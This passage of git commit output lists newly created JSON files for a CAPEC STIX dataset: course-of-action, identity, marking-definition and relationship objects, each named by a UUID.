capec/course-of-action/course-of-action--fbdb0083-1a81-4443-8e20-b6a66b60aca8.json create mode 100644 capec/course-of-action/course-of-action--fc5ba115-4db1-41fc-95b5-f4186728c20b.json create mode 100644 capec/course-of-action/course-of-action--fd843d46-0f31-4616-8745-fb369be4acd4.json create mode 100644 capec/course-of-action/course-of-action--fdde9b77-44fb-40ab-afcc-d2a4cc05c5ab.json create mode 100644 capec/course-of-action/course-of-action--fe2064cc-6c8a-4d9b-87e8-5f0491194111.json create mode 100644 capec/course-of-action/course-of-action--fe3ebc18-c3f2-4cc8-8740-7059cbd69c4c.json create mode 100644 capec/course-of-action/course-of-action--fef2690d-0830-4691-a0a7-247db5d61967.json create mode 100644 capec/course-of-action/course-of-action--ff8b5661-c55b-41a8-9267-9d3718ecaa03.json create mode 100644 capec/course-of-action/course-of-action--ffdecd8a-8e97-49ec-9a26-3a5507430430.json create mode 100644 capec/identity/identity--99e72de9-cd42-43b1-906d-c4f855fd3322.json create mode 100644 capec/marking-definition/marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89.json create mode 100644 capec/relationship/relationship--006c26af-3692-4dc4-b1a2-5dbf04504a06.json create mode 100644 capec/relationship/relationship--00738791-5997-44f1-b35a-6b2ff5bbdeb2.json create mode 100644 capec/relationship/relationship--00b2d802-87bd-4e59-9395-772602c5945b.json create mode 100644 capec/relationship/relationship--012c28c7-1587-4ee3-9a08-e8c88ad5b321.json create mode 100644 capec/relationship/relationship--01b04b8e-b59e-4cc9-b84c-f2b5704d6bf6.json create mode 100644 capec/relationship/relationship--01beec7d-cef0-4ca3-b4cc-6572ba0db0eb.json create mode 100644 capec/relationship/relationship--01c1eecc-d340-4af5-b4bd-b6e2212b2919.json create mode 100644 capec/relationship/relationship--0227718a-3bad-415f-b809-f3d03a16b89a.json create mode 100644 capec/relationship/relationship--027de0e5-e9fc-416d-befd-217351bd315b.json create mode 100644 capec/relationship/relationship--02b3d9fd-cd9e-430a-aa34-e1bae27fc0b6.json create mode 100644 capec/relationship/relationship--030ebc4a-d927-4e86-8e10-3247f913cfdf.json create mode 100644 capec/relationship/relationship--03143b55-e365-45e3-8ce7-add9d0df2063.json create mode 100644 capec/relationship/relationship--035510a6-4df7-43c5-a925-5c7a32099a19.json create mode 100644 capec/relationship/relationship--0388e527-777a-43f8-b7b9-f66f589f0d17.json create mode 100644 capec/relationship/relationship--03bacfac-0c39-45ba-afff-5ebfd7915d35.json create mode 100644 capec/relationship/relationship--040e879b-8793-4135-b210-1c25ea56c4a7.json create mode 100644 capec/relationship/relationship--04166c81-46af-491c-bef7-9923dbc63070.json create mode 100644 capec/relationship/relationship--0447a117-2569-47f3-8dcd-65036bcf0970.json create mode 100644 capec/relationship/relationship--0480be94-c756-4751-b321-18a928abdf59.json create mode 100644 capec/relationship/relationship--0483eeb1-b303-43dd-a4a4-8706e2f4f97c.json create mode 100644 capec/relationship/relationship--04a64c41-d891-4ea3-bcf1-ccf7548bf5fb.json create mode 100644 capec/relationship/relationship--06734356-1867-48f6-ba0d-a30c308aa090.json create mode 100644 capec/relationship/relationship--06918c00-aa82-45c3-9c95-b649ae753370.json create mode 100644 capec/relationship/relationship--069d7df7-8fac-44c4-8b79-12b6d675ed90.json create mode 100644 capec/relationship/relationship--06bf9287-f775-4bd0-a269-0523b5e8bc8f.json create mode 100644 capec/relationship/relationship--06e577c6-924c-4c7c-9bc1-0ebd78f9a78d.json create mode 100644 capec/relationship/relationship--07ca287a-78fb-473c-a87f-00cf46c5954c.json create mode 100644 capec/relationship/relationship--07f3d0eb-4e5a-4e95-aceb-2c1da8b29934.json create mode 100644 capec/relationship/relationship--08835a39-a775-4a48-91fc-9b8215778f8e.json create mode 100644 capec/relationship/relationship--0900c8f8-f195-448d-96d4-f618683f6f38.json create mode 100644 capec/relationship/relationship--09d07884-802a-43c4-af61-82225dd3b9d5.json create mode 100644 capec/relationship/relationship--0a2f1057-c343-415a-8403-0e54ee1b2102.json create mode 100644 capec/relationship/relationship--0a42ecec-67a3-4c2a-ae8c-793f827f9040.json create mode 100644 capec/relationship/relationship--0a7232a7-068b-4945-a0bc-2f4a68fb21d7.json create mode 100644 capec/relationship/relationship--0a8f8ebb-cbfb-411a-8036-205a911f1722.json create mode 100644 capec/relationship/relationship--0ae39bc1-3667-4e29-a2eb-ce457b0e97a1.json create mode 100644 capec/relationship/relationship--0b1dadc1-c04d-4c4e-8c94-bfa6711753ca.json create mode 100644 capec/relationship/relationship--0b652a5c-281d-4140-90be-a1a5414312c5.json create mode 100644 capec/relationship/relationship--0b670580-a2a8-40fc-907a-9ce3e92ae580.json create mode 100644 capec/relationship/relationship--0b6e7860-8271-4d61-bad2-42adc4251dd4.json create mode 100644 capec/relationship/relationship--0c079c84-5667-434a-a119-440390839df5.json create mode 100644 capec/relationship/relationship--0c11c0e0-9843-4467-b588-8275b71b6be1.json create mode 100644 capec/relationship/relationship--0c670e55-6327-4cc7-a383-353905982408.json create mode 100644 capec/relationship/relationship--0c8969f7-76a6-4787-8881-8d87de5bd816.json create mode 100644 capec/relationship/relationship--0c9b0403-cc38-48bb-871f-cea56cc7d045.json create mode 100644 capec/relationship/relationship--0ce0b1a5-555f-4061-a003-1a489efe2625.json create mode 100644 capec/relationship/relationship--0cf961b0-ae35-4695-994f-8039e3fcc61f.json create mode 100644 capec/relationship/relationship--0d2a6192-e031-4fc4-b2fa-ee091bbe6a50.json create mode 100644 capec/relationship/relationship--0d4a32c6-dddf-4dfb-be37-f273a260cde1.json create mode 100644 capec/relationship/relationship--0e134162-939b-4f1c-a3a7-2a4cd17e1a3f.json create mode 100644 capec/relationship/relationship--0e746897-8cb9-4202-bed5-27c2fcc346df.json create mode 100644 capec/relationship/relationship--0fa93fd1-67a7-46f1-9cc0-f274c2d551b3.json create mode 100644 capec/relationship/relationship--10170868-118d-40ea-8af2-5db1c1e3a7bd.json create mode 100644 capec/relationship/relationship--103ed571-70dd-468a-8af7-d63da596f200.json create mode 100644 capec/relationship/relationship--1048b2ed-809f-4b9b-903a-d08691dc1f76.json create mode 100644 capec/relationship/relationship--10789595-855a-44a4-8fe8-78678c296ed7.json create mode 100644 capec/relationship/relationship--10c9a57f-7f43-43d7-b57d-d725239e32ea.json create mode 100644 capec/relationship/relationship--10ea2f65-887c-421b-a3d5-8056685a42d5.json create mode 100644 capec/relationship/relationship--110567ab-f53e-4f7e-ba84-08578ee941c8.json create mode 100644 capec/relationship/relationship--11351ce9-4860-4659-b06f-dffcc542cc7d.json create mode 100644 capec/relationship/relationship--113ef7e7-b8bd-44d3-bfae-8dcffd163521.json create mode 100644 capec/relationship/relationship--1163325b-6a63-4c5a-8d83-3e55abb1b32e.json create mode 100644 capec/relationship/relationship--120f0fd7-afbd-4c09-ba25-768d2f06b935.json create mode 100644 capec/relationship/relationship--12473cb4-52de-4c12-a0c1-7bbe89797c54.json create mode 100644 capec/relationship/relationship--124a6bc7-eaef-45e2-bb9e-0359803ef430.json create mode 100644 capec/relationship/relationship--137d1e59-52d9-421d-be20-071fd187f49c.json create mode 100644 capec/relationship/relationship--13a44cf6-6aaa-4ebd-955a-5d5a951e7c35.json create mode 100644 capec/relationship/relationship--13d97a1d-7ced-4f30-bf94-573c1209abde.json create mode 100644 capec/relationship/relationship--14079416-a0e8-4923-9eda-2849d1b430ee.json create mode 100644 capec/relationship/relationship--14a6218e-49e6-4932-a764-e62962e4b779.json create mode 100644 capec/relationship/relationship--14b39aa2-a729-45e4-908e-93c06137a89b.json create mode 100644 capec/relationship/relationship--14d99e66-93e6-481c-ad94-22819118abe4.json create mode 100644 capec/relationship/relationship--14fbd49a-5f94-48f0-8ca6-ffef3f9c2d0e.json create mode 100644 capec/relationship/relationship--15e58cc3-2891-4af9-9ce2-a95c7971e74b.json create mode 100644 capec/relationship/relationship--166618a5-698e-411e-94e1-e1d879d19a95.json create mode 100644 capec/relationship/relationship--171b92d3-4d57-42c4-bda5-f7f86528e143.json create mode 100644 capec/relationship/relationship--17c88c42-12fc-4dfa-ba39-092b1c6c3b2d.json create mode 100644 capec/relationship/relationship--18006d48-8c85-41bc-a8c7-5b349247540c.json create mode 100644 capec/relationship/relationship--18a18868-d0bc-4868-a2b4-6a0eca4aba7c.json create mode 100644 capec/relationship/relationship--19a8a4e0-cf9b-45e5-a856-3de57b5b1054.json create mode 100644 capec/relationship/relationship--19a97228-07cd-41cf-9b77-4d3003b74062.json create mode 100644 capec/relationship/relationship--1a780b0b-c16d-44dc-828d-1ff6d4616cb1.json create mode 100644 capec/relationship/relationship--1a7a10fe-b358-4927-9821-52ae29e5485c.json create mode 100644 capec/relationship/relationship--1ae6475a-bf31-49ee-b0c2-f878f33ed3ff.json create mode 100644 capec/relationship/relationship--1b7338cd-e195-45fa-9a3d-0179a64934f3.json create mode 100644 capec/relationship/relationship--1ba4b3b6-d17b-40d3-9fc6-db2a75333595.json create mode 100644 capec/relationship/relationship--1bb26593-39f0-4a1c-a8d8-d8118c3831ed.json create mode 100644 capec/relationship/relationship--1bb6b392-107e-411c-9afb-54d84e17531c.json create mode 100644 capec/relationship/relationship--1bbed2f9-90b0-4ce2-a6b9-2f6355369294.json create mode 100644 capec/relationship/relationship--1c0dc8fb-b6e9-4f03-a461-a75469ecaf9b.json create mode 100644 capec/relationship/relationship--1d52ef9a-ad22-42c8-a1e6-f7da34cec76f.json create mode 100644 capec/relationship/relationship--1d6ecefe-10f4-467f-baed-296badec1094.json create mode 100644 capec/relationship/relationship--1db8d2bb-e3dd-4039-922c-f922ffc07e93.json create mode 100644 capec/relationship/relationship--1de48e9e-d723-4e09-8f82-58850a322009.json create mode 100644 capec/relationship/relationship--1e183c89-a8ef-4363-ad68-714b5e204618.json create mode 100644 capec/relationship/relationship--1e56ad74-b2cd-4272-b9fe-b72befdd3974.json create mode 100644 capec/relationship/relationship--1e708afb-208f-4166-a11b-40342db93818.json create mode 100644 capec/relationship/relationship--1e882b1c-a38b-4059-945d-44885804a5c7.json create mode 100644 capec/relationship/relationship--1eb8e908-57d4-4685-962a-af7362d3c0b5.json create mode 100644 capec/relationship/relationship--1f14c3e6-c62b-4ac2-bfd7-7b004ea6fd38.json create mode 100644 capec/relationship/relationship--1f30afb7-1953-45f8-975c-dc920f73d473.json create mode 100644 capec/relationship/relationship--1f7f81e8-3b04-49a1-babd-2ef6e940666c.json create mode 100644 capec/relationship/relationship--1f89fa6a-7453-4013-a34f-689b973a23e3.json create mode 100644 capec/relationship/relationship--1fe263b0-04b9-4913-a084-d8725f7f7b68.json create mode 100644 capec/relationship/relationship--207131df-5246-4c27-9dde-d897d7f253a2.json create mode 100644 capec/relationship/relationship--209a3806-a657-478d-9382-2cc64291f6a0.json create mode 100644 capec/relationship/relationship--20e81069-3719-4684-aa7c-43af82746bf5.json create mode 100644 capec/relationship/relationship--20e8b9af-45d9-40b4-89e6-3795e035f51b.json create mode 100644 capec/relationship/relationship--2294febb-9f8b-40a6-911c-f9b179522be3.json create mode 100644 capec/relationship/relationship--237f63b0-e1b6-488d-b059-ec759cf6d24b.json create mode 100644 capec/relationship/relationship--23d7d11a-ccd2-494d-b2dc-2e4a7b4506bf.json create mode 100644 capec/relationship/relationship--2563f295-5573-4255-a1f6-7ee682f62212.json create mode 100644 capec/relationship/relationship--258dcdbb-8d95-46a1-a8ae-a0d978b57b8f.json create mode 100644 capec/relationship/relationship--259f250f-174c-4de7-9ff1-f5d63d9f4861.json create mode 100644 capec/relationship/relationship--25e17ee0-ca6f-45b3-8159-af6c9ee6a320.json create mode 100644 capec/relationship/relationship--25fc7307-68af-4ebd-b242-54b63889347d.json create mode 100644 capec/relationship/relationship--26e72254-f7e5-44c2-8a3e-2a78d130b5c6.json create mode 100644 capec/relationship/relationship--274e4808-9a33-4298-aa29-938291b48a4d.json create mode 100644 capec/relationship/relationship--278293b6-4f1f-4025-9511-c9b8f4339668.json create mode 100644 capec/relationship/relationship--2832eade-8817-43d1-88df-966aea51275c.json create mode 100644 capec/relationship/relationship--285cebe8-107a-4dc4-bcf0-f551abd8d818.json create mode 100644 capec/relationship/relationship--287e77a8-6932-4aaf-89fb-fb8430c7fcf0.json create mode 100644 capec/relationship/relationship--2880a858-4b3b-40dc-9a58-44e0b4f8555d.json create mode 100644 capec/relationship/relationship--28956a76-3892-41c8-90e0-d027d1d65c4f.json create mode 100644 capec/relationship/relationship--28cccf5a-d4bd-4d55-88da-2ca4d583c1a2.json create mode 100644 capec/relationship/relationship--2927ef8c-7d8b-427f-af4c-7dfc72351f9f.json create mode 100644 capec/relationship/relationship--2a99063d-6087-4919-b051-c9f383e23a58.json create mode 100644 capec/relationship/relationship--2b0be4a8-baeb-4275-becd-c395fb0d1fa0.json create mode 100644 capec/relationship/relationship--2b95a8fd-34cc-488e-b836-7fd91b9e7738.json create mode 100644 capec/relationship/relationship--2c9420b0-57bf-42b8-9620-4fcd3498da62.json create mode 100644 capec/relationship/relationship--2d065a75-e47c-434f-81a2-8b53ac78a555.json create mode 100644 capec/relationship/relationship--2d2380c2-85b1-4b31-a175-301f5d739afb.json create mode 100644 capec/relationship/relationship--2d6b779f-9f4b-48c6-8122-a6f2bb2507c8.json create mode 100644 capec/relationship/relationship--2d8bc8db-1af3-4c2a-bf80-b1f189f03c7d.json create mode 100644 capec/relationship/relationship--2ec2d107-0a46-4c1a-8a24-39430c2fa965.json create mode 100644 capec/relationship/relationship--2ef87cd6-21d3-43ef-8fff-8bd608da5fd3.json create mode 100644 capec/relationship/relationship--2f16d009-dec7-4cb5-a028-0060e59bee3d.json create mode 100644 capec/relationship/relationship--2f80e922-6445-4cef-a0fd-3cee4349662e.json create mode 100644 capec/relationship/relationship--2f83a558-1c50-4163-8ee4-5dfdc15a7f9c.json create mode 100644 capec/relationship/relationship--2fd4f7b0-9f82-4bf5-97ee-aee0f01263a6.json create mode 100644 capec/relationship/relationship--3050a257-2430-4ad9-a747-b6f45af0416f.json create mode 100644 capec/relationship/relationship--30cca37e-cc03-4f7a-862c-c007d7ff7153.json create mode 100644 capec/relationship/relationship--3154d4bf-605f-494e-b940-0922a96cba1e.json create mode 100644 capec/relationship/relationship--31c0ce8e-9d50-4d93-a92c-e57c243f2496.json create mode 100644 capec/relationship/relationship--32443837-429a-488d-b2e1-0d00e309e10c.json create mode 100644 capec/relationship/relationship--324d5558-538a-42e4-8dc7-00f3f0b83837.json create mode 100644 capec/relationship/relationship--32daa3f9-f58d-4e4d-8d3b-7e513b3889e0.json create mode 100644 capec/relationship/relationship--3327631e-c3c1-46cc-a867-cedd139c58a0.json create mode 100644 capec/relationship/relationship--3373eabb-6268-44c7-855e-7ee2c75a486b.json create mode 100644 capec/relationship/relationship--33e09541-7bdb-409c-87ee-c2d5fac60326.json create mode 100644 capec/relationship/relationship--33e853e4-5e1b-4e95-9118-2aa7e26e1508.json create mode 100644 capec/relationship/relationship--346d9661-926f-445d-b7e3-e41c8754c75e.json create mode 100644 capec/relationship/relationship--348aebbc-09b9-4051-a6ed-425b45fe65e6.json create mode 100644 capec/relationship/relationship--34d3d53a-099c-40bd-9bea-48dc6cf18afe.json create mode 100644 capec/relationship/relationship--34d9a6e1-68cf-469f-a760-bbb6ba77993e.json create mode 100644 capec/relationship/relationship--34e6a203-ba0f-4f43-a315-bb3c09f7f158.json create mode 100644 capec/relationship/relationship--352aff2e-6c58-4e38-ab7c-d2f1a2cc9731.json create mode 100644 capec/relationship/relationship--35505ab0-f3ec-431e-b6b2-bb34d1beeda8.json create mode 100644 capec/relationship/relationship--3580d7ad-9cd2-4f77-b0d0-d53ecad8accd.json create mode 100644 capec/relationship/relationship--35a67c41-70aa-4d22-86fc-cec38bf33bee.json create mode 100644 capec/relationship/relationship--3623d044-a85f-4909-8331-8a31b37f675f.json create mode 100644 capec/relationship/relationship--36642b47-bc5e-4cfd-9c04-15d777f15fda.json create mode 100644 capec/relationship/relationship--3678b827-67b3-4ca6-850c-988363d2598c.json create mode 100644 capec/relationship/relationship--36bfdede-befc-4cec-ada6-f0a1c5de2e01.json create mode 100644 capec/relationship/relationship--371cbb7c-b04f-45df-a03a-84a6133e7aef.json create mode 100644 capec/relationship/relationship--3725b37e-cb09-4e19-bfd4-673f83aa8632.json create mode 100644 capec/relationship/relationship--373af6e0-eeda-4135-b28d-6bf58dd00b72.json create mode 100644 capec/relationship/relationship--373b622f-b2bd-4d74-8ae4-3adff948fdab.json create mode 100644 capec/relationship/relationship--376bcad4-7b88-4547-891d-6001cb010439.json create mode 100644 capec/relationship/relationship--37792e34-0aae-41e2-8083-a0840183fe5d.json create mode 100644 capec/relationship/relationship--37a4a4d5-c754-4240-b263-f60dc1d87d22.json create mode 100644 capec/relationship/relationship--3805a6cc-3536-47fa-91db-037018a0ef61.json create mode 100644 capec/relationship/relationship--380fdf35-ff22-493d-a810-e049e6b31310.json create mode 100644 capec/relationship/relationship--3820337c-7206-4af3-90ba-cf4815079d78.json create mode 100644 capec/relationship/relationship--384181bc-f41a-411a-9890-9a1b919f1901.json create mode 100644 capec/relationship/relationship--3843f389-1e7b-4f67-aa6a-72c1471300ac.json create mode 100644 capec/relationship/relationship--384f6e68-3547-4a13-9297-533d7b8d9f50.json create mode 100644 capec/relationship/relationship--38d069d4-4832-41a5-8156-70a3596620bf.json create mode 100644 capec/relationship/relationship--3952c82d-c89f-4067-9788-6a3a29d3ef5b.json create mode 100644 capec/relationship/relationship--39f5e21d-6c4f-4738-9d0c-1fce0621d0a0.json create mode 100644 capec/relationship/relationship--3ac4cb17-60a8-410b-b924-49850bf5e00d.json create mode 100644 capec/relationship/relationship--3ad69ce4-412d-4639-8737-c22355bad36c.json create mode 100644 capec/relationship/relationship--3aff07c6-531e-48f5-a2f0-14adeae03995.json create mode 100644 capec/relationship/relationship--3b1b196e-a5d4-4a1f-bc3b-2a1aa3ab5b37.json create mode 100644 capec/relationship/relationship--3c30a18d-ff08-4fbc-8b9f-4a270cbcd1f7.json create mode 100644 capec/relationship/relationship--3c6dba09-e75d-4a64-8220-7d71fbb3ca03.json create mode 100644 capec/relationship/relationship--3cf737b6-79f0-4786-af11-37a8ad5849b1.json create mode 100644 capec/relationship/relationship--3cfe6afb-876c-4549-8787-77ff70578ce7.json create mode 100644 capec/relationship/relationship--3d69e68b-f84b-4163-be92-216e1b4112d2.json create mode 100644 capec/relationship/relationship--3da638be-62d3-463c-b831-d98972595ef7.json create mode 100644 capec/relationship/relationship--3db7674a-ce85-49f1-a061-d5c0484d9466.json create mode 100644 capec/relationship/relationship--3dfc631a-ebe7-4dbe-a48c-5dcf02783a5d.json create mode 100644 capec/relationship/relationship--3e7a154a-154b-4d77-855d-ff9108b16678.json create mode 100644 capec/relationship/relationship--3e962b00-a7d0-42bc-81b7-8c1c8f2a7e4f.json create mode 100644 capec/relationship/relationship--3eab43ab-6647-4310-bb1c-917fe6d532c8.json create mode 100644 capec/relationship/relationship--3ecdd1e5-d6b7-43ed-af41-31b29883030d.json create mode 100644 capec/relationship/relationship--3ed4317e-bd08-4da8-819d-409b4a553b41.json create mode 100644 capec/relationship/relationship--3ee7e6be-df86-4df0-98cc-76437ba3679c.json create mode 100644 capec/relationship/relationship--3eff23ad-da0e-4d77-b000-c19f0aeaf00f.json create mode 100644 capec/relationship/relationship--3f6129b2-9c1d-44f6-ae21-f8df3235afa6.json create mode 100644 capec/relationship/relationship--3f64ffc4-4082-4522-9978-18e5336b64e0.json create mode 100644 capec/relationship/relationship--3f790849-a989-44bd-8e1d-d4cd541aea66.json create mode 100644 capec/relationship/relationship--3ff8705f-fc4e-4b8b-81a5-2631871c5b63.json create mode 100644 capec/relationship/relationship--40aa19f8-24c9-4dc3-876b-4d879bc632d9.json create mode 100644 capec/relationship/relationship--40f247b7-b73b-42f0-8b9e-82cd806a9bdd.json create mode 100644 capec/relationship/relationship--418ae38a-5f47-4d2b-a587-8a3d06f52e18.json create mode 100644 capec/relationship/relationship--41e4519b-aa9d-41d6-8893-7929b515667a.json create mode 100644 capec/relationship/relationship--41ee0f19-8e89-40ba-bca9-71f8260e549b.json create mode 100644 capec/relationship/relationship--4240910f-d963-4711-8840-ced5c6574b16.json create mode 100644 capec/relationship/relationship--42e9c35f-213d-4a90-8635-972c1e112e22.json create mode 100644 capec/relationship/relationship--42fa5e6c-6844-40d2-95cd-546d532dbe2f.json create mode 100644 capec/relationship/relationship--43620880-b38c-4cf0-8aee-8a522dba7ec0.json create mode 100644 capec/relationship/relationship--43ad5189-f992-454a-bb64-130c06a71e46.json create mode 100644 capec/relationship/relationship--43c01944-e35a-4933-8afc-2611060ce775.json create mode 100644 capec/relationship/relationship--44c86cc6-d5b3-4aba-a9e1-a8996a5711b1.json create mode 100644 capec/relationship/relationship--4501043c-9ef9-49d7-880c-9b86a6e6b972.json create mode 100644 capec/relationship/relationship--45615c94-2b28-49fb-8516-b529a389c8e8.json create mode 100644 capec/relationship/relationship--4565c93a-9073-48e1-95b3-7c1d7424096e.json create mode 100644 capec/relationship/relationship--456dd93d-dc75-4df9-bdb9-f72d6434d738.json create mode 100644 capec/relationship/relationship--458cb85d-355f-4b67-af71-eda3f97098e9.json create mode 100644 capec/relationship/relationship--45e9e777-290f-4487-a2b8-cc734bd576de.json create mode 100644 capec/relationship/relationship--460dbf85-6d21-426d-965f-e46fdf180719.json create mode 100644 capec/relationship/relationship--4624b19e-5704-4747-a1ea-1b857692f821.json create mode 100644 capec/relationship/relationship--46a94477-fcd6-438a-acc6-5f613e993979.json create mode 100644 capec/relationship/relationship--46cc47c4-f87c-420f-86ad-1c5924903da7.json create mode 100644 capec/relationship/relationship--46deae11-cdef-4ff0-8112-dd2ef024dfc4.json create mode 100644 capec/relationship/relationship--47087e35-bd4f-46c7-8d01-6312d655f85f.json create mode 100644 capec/relationship/relationship--4784e3b1-b9fe-44f7-8155-d30786b6e010.json create mode 100644 capec/relationship/relationship--47a0f4dd-4da8-4516-a0c4-d529b72720ad.json create mode 100644 capec/relationship/relationship--47afd0f6-2880-4127-9e59-1ab92546ffa0.json create mode 100644 capec/relationship/relationship--47bc009e-e6bb-486e-9fe7-9024aebe6b46.json create mode 100644 capec/relationship/relationship--47d20968-0f5f-4c61-a962-fc2245126384.json create mode 100644 capec/relationship/relationship--49367de5-15be-4ddf-b60b-23ae4b9813a9.json create mode 100644 capec/relationship/relationship--4938d4d3-16de-4114-82b9-38a3e5be6fba.json create mode 100644 capec/relationship/relationship--49eaee57-6195-456a-8340-de94e718e22a.json create mode 100644 capec/relationship/relationship--4a6ec7c1-23d0-4b8f-ac5c-22bc643a94d5.json create mode 100644 capec/relationship/relationship--4ae89b18-a464-4592-8968-9bb41ab779f0.json create mode 100644 capec/relationship/relationship--4b292e1b-e5c9-4b4e-93b9-4b3bc7b99237.json create mode 100644 capec/relationship/relationship--4b4b6bd8-9567-4eb7-9f26-92bcd4c983dd.json create mode 100644 capec/relationship/relationship--4b5b441e-ca75-44a1-8434-64a9ad7ad4eb.json create mode 100644 capec/relationship/relationship--4be0ecb0-9723-45f8-8061-11800e4edbc2.json create mode 100644 capec/relationship/relationship--4bfa8d8c-d670-4b99-8b9c-2f08f32e3166.json create mode 100644 capec/relationship/relationship--4c3b04af-8b60-4007-abda-506aac43bb8a.json create mode 100644 capec/relationship/relationship--4c785d20-0748-4aca-b848-985dcea65400.json create mode 100644 capec/relationship/relationship--4c88411e-75aa-4bcd-9c3f-59ffa93bd362.json create mode 100644 capec/relationship/relationship--4cca1ccd-e137-464d-ab7f-c8a3988a73a0.json create mode 100644 capec/relationship/relationship--4d534e82-995b-4514-b92f-1c323150cc3d.json create mode 100644 capec/relationship/relationship--4dc5a0f9-3494-4485-83a7-e9c8cbb222eb.json create mode 100644 capec/relationship/relationship--4dd07f35-9062-41e7-906b-fa082b33e7fe.json create mode 100644 capec/relationship/relationship--4def2e05-a5c8-42b8-88f5-3e10020490fa.json create mode 100644 capec/relationship/relationship--4df2531e-b3be-4f20-9ea3-404a1bf7e404.json create mode 100644 capec/relationship/relationship--4e987ce4-7103-4162-8b09-6b27cdbcc61b.json create mode 100644 capec/relationship/relationship--4f032d86-62c0-45e0-bff3-1225fd6493f9.json create mode 100644 capec/relationship/relationship--4f514d35-bcdf-4cac-9b22-6b09cdd343c0.json create mode 100644 capec/relationship/relationship--4f7f95e1-cc77-4ae3-ab6c-667480d8c2bc.json create mode 100644 capec/relationship/relationship--4fbb06d8-f344-4a8e-943f-df784ff2b3f8.json create mode 100644 capec/relationship/relationship--50242ad9-aedd-434c-925e-38a48594e658.json create mode 100644 capec/relationship/relationship--5030b26b-2e31-4ca9-b274-43bfc198a700.json create mode 100644 capec/relationship/relationship--5078b089-d7d2-44f7-a5c1-2bc5c6cf14e8.json create mode 100644 capec/relationship/relationship--508a8334-06c6-4698-9bec-1d301d20624b.json create mode 100644 capec/relationship/relationship--513339b3-7600-479a-b0e5-2de24c0711d1.json create mode 100644 capec/relationship/relationship--516e70d6-117b-44cf-a856-6b06d88e15d1.json create mode 100644 capec/relationship/relationship--51dfaa94-3c78-4a45-bb60-428eb7f8c2b3.json create mode 100644 capec/relationship/relationship--51eb4e97-a357-48a1-b4d5-8bfd55a3ece8.json create mode 100644 capec/relationship/relationship--5223036e-d72f-458a-b15e-7d23f915e585.json create mode 100644 capec/relationship/relationship--5246a9a1-a828-4493-bc5d-0c344fddbfc0.json create mode 100644 capec/relationship/relationship--52ba2e20-a0b2-4e29-9b0f-c099583a86c5.json create mode 100644 capec/relationship/relationship--52dba241-197a-4511-b849-29a81759e57c.json create mode 100644 capec/relationship/relationship--52ea33a3-3eeb-447a-ad23-ea156eeeb029.json create mode 100644 capec/relationship/relationship--52efd59e-b4fc-42d8-bea1-0a32c41b5d8b.json create mode 100644 capec/relationship/relationship--53468df7-a022-4040-aa2c-33c43de2c9df.json create mode 100644 capec/relationship/relationship--53e2f392-5712-4b5b-a401-99c7f82d0925.json create mode 100644 capec/relationship/relationship--53f187f0-79bc-4065-a271-956d97ffa319.json create mode 100644 capec/relationship/relationship--53f66ea4-1e34-4a25-9b1c-2b1bf1f1fa96.json create mode 100644 capec/relationship/relationship--540b1b69-27bb-47db-b105-9d3a598ffef3.json create mode 100644 capec/relationship/relationship--54391f32-58d7-44a3-af1d-14d83cb886e7.json create mode 100644 capec/relationship/relationship--54452909-cad4-4a57-b56d-86baaab434c2.json create mode 100644 capec/relationship/relationship--544fb6ca-a863-4704-885c-4723b72574fa.json create mode 100644 capec/relationship/relationship--546e4b92-0622-4b9b-81ad-fcceb717bc4c.json create mode 100644 capec/relationship/relationship--54873c18-4e0e-4118-94f3-6c45ae539f12.json create mode 100644 capec/relationship/relationship--5492510a-bd3b-4b57-9488-9da352508d9f.json create mode 100644 capec/relationship/relationship--54bc9c0c-cf8b-441b-9370-bc490e63abe2.json create mode 100644 capec/relationship/relationship--550cbc7c-16f1-4496-b8bc-37eeeb3533c8.json create mode 100644 capec/relationship/relationship--55437352-14d9-4b7e-94a5-bed55b4262ce.json create mode 100644 capec/relationship/relationship--56365a37-e65d-4bea-ba0d-d078e1ac103f.json create mode 100644 capec/relationship/relationship--56822943-78a1-412c-8e7c-789b8788c1f0.json create mode 100644 capec/relationship/relationship--56aef797-37d8-408d-ae9b-676eb6cf9f7d.json create mode 100644 capec/relationship/relationship--56c95b43-a838-4c15-9a28-a8335608affc.json create mode 100644 capec/relationship/relationship--56d1a69b-20e6-4fd2-a301-128aadab1419.json create mode 100644 capec/relationship/relationship--56fdfa4a-a8bf-4465-b83a-f6c1b7aa029c.json create mode 100644 capec/relationship/relationship--57a612fe-f3fe-4b44-969d-e8caed9ffb73.json create mode 100644 capec/relationship/relationship--57b4b08f-4086-409c-9edc-2030dfb7466f.json create mode 100644 capec/relationship/relationship--57c1bcea-ed91-4771-83ef-cdbde39d99ec.json create mode 100644 capec/relationship/relationship--57c6bb14-b4fa-4e8f-9852-adede60c8226.json create mode 100644 capec/relationship/relationship--57dab16f-1f71-4c18-831b-30cc259ec6f9.json create mode 100644 capec/relationship/relationship--57dc1ba3-6dec-4b09-a46d-6b9b8f7065be.json create mode 100644 capec/relationship/relationship--57efa208-73e1-4b02-97a8-b3664d6c79aa.json create mode 100644 capec/relationship/relationship--58629d49-751c-4442-a4f8-e8650c594715.json create mode 100644 capec/relationship/relationship--58e5a02d-bb53-48fb-8003-7d5e32bf5226.json create mode 100644 capec/relationship/relationship--58ee4fe8-4fab-4910-b709-68fb70ff981b.json create mode 100644 capec/relationship/relationship--5944cffe-d0fc-4ca9-8b0b-b3e877e439fe.json create mode 100644 capec/relationship/relationship--59760aef-867c-4ae8-b3ad-56fae9788f7a.json create mode 100644 capec/relationship/relationship--598d9026-5333-4e2a-9077-8a53f6171f24.json create mode 100644 capec/relationship/relationship--5ab822cf-4232-4248-aeb8-8ab2a78b1671.json create mode 100644 capec/relationship/relationship--5af295c0-cc26-47df-aabd-6091ac0f4867.json create mode 100644 capec/relationship/relationship--5b406ca0-fcc2-4dbf-8c07-60b9e727fafa.json create mode 100644 capec/relationship/relationship--5c02a22b-6aea-4603-8d2c-5eb93c5a45c5.json create mode 100644 capec/relationship/relationship--5d0a2538-e498-469d-a298-8e36a20d5a91.json create mode 100644 capec/relationship/relationship--5d249d82-dbd1-4077-8174-67cb7b52a06d.json create mode 100644 capec/relationship/relationship--5d78debf-8201-4100-b658-aaa763cd154e.json create mode 100644 capec/relationship/relationship--5e94abf8-fdbc-4b80-ae54-bd12dc2c72dc.json create mode 100644 capec/relationship/relationship--5f4deeb9-ea0e-469e-b10a-3308228d5b04.json create mode 100644 capec/relationship/relationship--5f6fa659-4938-4749-a3cd-614942f7e23c.json create mode 100644 capec/relationship/relationship--5f8e2177-5722-41bc-a65c-c3ce8e7ecf10.json create mode 100644 